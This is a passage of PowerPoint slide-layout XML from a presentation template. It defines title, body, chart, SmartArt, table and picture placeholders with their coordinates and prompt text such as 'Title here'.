            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408939" y="2405849"/>
            <a:ext cx="4811697" cy="3630180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC840FDE-67CE-2133-5666-BCDB120D731E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400051" y="720724"/>
            <a:ext cx="4840906" cy="1163955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B23F7BE4-31F2-C713-F63B-3A7F973F003C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404432" y="1923993"/>
            <a:ext cx="4836674" cy="300966"/>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3453207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age Large Chart">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Chart Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01414C0-42A8-2269-5E3D-078F5348ECEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="394440" y="1871626"/>
            <a:ext cx="11414345" cy="4688973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17AF9A8C-02D3-9B29-D6CD-1F8E01B02CC4}"/>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6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9BF160-6193-270F-B828-31AB71DA2CC4}"/>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20629201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age Large Diagram/Graphics">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="SmartArt Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E9AA945-372B-6844-526D-31636722E0C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dgm" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="1939332"/>
            <a:ext cx="11415086" cy="4597993"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add SmartArt graphic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB00C441-95DD-3A6F-1B25-2383E5FD86FA}"/>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5" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C390D38-4A32-BD22-127F-7254619AB626}"/>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31163001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age Table">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Table Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8664356-8092-7C12-A9AF-DCD1988885E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410950" y="1871625"/>
            <a:ext cx="11414346" cy="4662341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D0F815-72C2-C2D6-65BC-129D070E117F}"/>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5" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72C76B8-4A35-E0E0-9CD9-4CC48C6A162B}"/>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365317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age 3title_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8FB29A-0C01-C41E-3633-D948A07BF39F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410870" y="2528240"/>
            <a:ext cx="3270250" cy="39030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91607489-5E09-0AAF-348A-DA11D7592FBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4361212" y="2528240"/>
            <a:ext cx="3270250" cy="39030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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDAF868A-FD3E-7F5F-9B93-25DEB5B17558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342034" y="2528240"/>
            <a:ext cx="3270250" cy="39030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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E021CA-9C91-E793-B858-3393F0B767B7}"/>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15" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4010258D-217A-85CC-EA7A-C2A6C1B2125F}"/>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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D98854CB-ECF8-BF00-8DF2-4C84A3CF99BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411163" y="2124076"/>
            <a:ext cx="3270250" cy="337718"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5234DDC-2918-EB62-1B19-82CAFC93EC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4361212" y="2124075"/>
            <a:ext cx="3270250" cy="337718"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09E3EFD8-87DE-CF43-8A22-176CAAEE6854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8311261" y="2124074"/>
            <a:ext cx="3270250" cy="337718"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216305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age 5Icons_tex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1607489-5E09-0AAF-348A-DA11D7592FBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480398" y="3886414"/>
            <a:ext cx="2028494" cy="2532808"/>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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1BCF842-115E-4232-1C48-9126EA65A592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584193" y="2972627"/>
            <a:ext cx="1820905" cy="817637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Picture Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A7B229-FD6C-95A7-5B9E-216322EF41FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="934258" y="1944358"/>
            <a:ext cx="1120775" cy="919162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A382F0A3-C7B3-7D09-97CF-D42D5657C905}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2818314" y="3886414"/>
            <a:ext cx="2028494" cy="2532808"/>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25B74255-00F2-D2BE-B508-D3A17AE0CEAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2922109" y="2972627"/>
            <a:ext cx="1820905" cy="817637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Picture Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5646B643-8B8D-1E90-193B-6095705653F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3272174" y="1944358"/>
            <a:ext cx="1120775" cy="919162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{765A4BDC-9CD8-01F7-EBE0-DD4AEFCB3BAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156230" y="3886414"/>
            <a:ext cx="2028494" cy="2532808"/>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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{505147CB-3F1D-B25B-256C-F25812A67B20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5260025" y="2972627"/>
            <a:ext cx="1820905" cy="817637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Picture Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0073EB5-9D63-4953-5303-907CE1B44B26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5610090" y="1944358"/>
            <a:ext cx="1120775" cy="919162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E82F5EE-1C37-2FA4-1CA6-F76F784EBDF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7494146" y="3886414"/>
            <a:ext cx="2028494" cy="2532808"/>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Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B71ED8A3-97B7-3089-DE8A-0C86DD14B0AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7597941" y="2972627"/>
            <a:ext cx="1820905" cy="817637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Picture Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D328D6B4-177A-5368-43F2-68203D1738B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7948006" y="1944358"/>
            <a:ext cx="1120775" cy="919162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E22C3C96-C185-D619-7E2E-8C06A9F93B74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9832062" y="3886414"/>
            <a:ext cx="2028494" cy="2532808"/>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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46CEDEEE-4B12-4A82-1847-A55E69EB0ABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9935857" y="2972627"/>
            <a:ext cx="1820905" cy="817637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Picture Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E44623B-5BA3-6EF4-C44A-BB399B279C1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="30"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10285922" y="1944358"/>
            <a:ext cx="1120775" cy="919162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44216653-1C7B-F054-DFC2-FC7A046E4A78}"/>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5" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73A42A70-D52E-878E-AA87-94574F4C007A}"/>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5476182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age 4title_tex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1D8CB20-B0C1-A94A-B1E7-80836EF44AAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431190" y="2889990"/>
            <a:ext cx="5442630" cy="337718"/>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1" baseline="0">
                <a:latin typeface="+mj-lt"/>
